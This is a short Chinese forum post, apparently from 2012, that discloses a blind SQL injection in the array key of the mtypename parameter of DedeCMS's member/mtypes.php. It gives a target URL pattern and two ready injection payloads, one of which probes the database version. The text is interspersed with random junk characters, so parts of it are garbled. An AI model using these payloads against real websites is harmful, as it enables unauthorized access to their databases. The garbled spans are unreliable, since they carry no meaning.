需要magic_quotes_gpc = Off,所以说是鸡肋啊.
* ~) [: C. [& q% @- U7 h( P% B# f* x5 I+ A: X1 l9 w$ H. F
8 I, X- e+ E. |: U& }3 U/ `0 m! X
发生在数组key里的注射漏洞,有点意思.' o* B/ ?6 ?/ t% O( H
& x4 R0 W) W6 [ K2 o% `% m这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
( V2 y7 W. U5 f' }2 w0 X+ M4 Z
/ w9 S, g# J/ phttp://www.xxx.com /dede/member/mtypes.php?dopost=save$ j4 z% s0 Y$ D+ g# K) C
; l7 I/ X3 A$ w
exploit:
7 Z2 U. ~( V$ n8 m+ x& Zmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
$ O* C8 l) j. u j9 umtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r8 b2 |, }, J0 e/ ?
|
发表于 2012-12-20 08:08:09
收藏
支持
反对